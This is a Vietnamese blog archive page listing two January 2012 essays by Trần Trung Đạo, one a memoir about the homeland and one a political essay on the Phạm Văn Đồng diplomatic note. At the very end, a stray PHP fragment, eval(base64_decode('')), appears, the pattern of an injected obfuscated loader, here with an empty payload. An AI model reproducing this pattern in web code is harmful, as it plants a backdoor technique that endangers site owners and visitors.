Archive for January, 2012

Trần Trung Đạo: Mùa xuân trên quê hương ngoài ký ức

Trần Trung Đạo: Mùa xuân trên quê hương ngoài ký ức

Mùa xuân trên quê hương ngoài ký ức Tháng Tư năm ngoái, trong một bài phỏng vấn của anh Duy Ái, đài VOA, tôi có trả lời “quê hương Việt Nam sau năm 1975 là quê hương để nhớ để thương chứ không phải để sống”. Thoạt nghe dễ

01.17.2012 | Ký-Truyện-Tùy Bút |

2 Comments

Từ “Phạm Văn Đồng” tới “Thành Đô”, hai công hàm bán nước

Từ “Phạm Văn Đồng” tới “Thành Đô”, hai công hàm bán nước

Về hình thức “công hàm Phạm Văn Đồng” chẳng khác gì một công án thiền, chỉ 121 chữ với nội dung đơn giản nhưng làm tốn không biết bao nhiêu giấy mực, phân tích, bàn thảo và làm ngưng chảy dòng nhận thức của mọi người mỗi

01.10.2012 | Tiểu Luận- Chính Luận |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>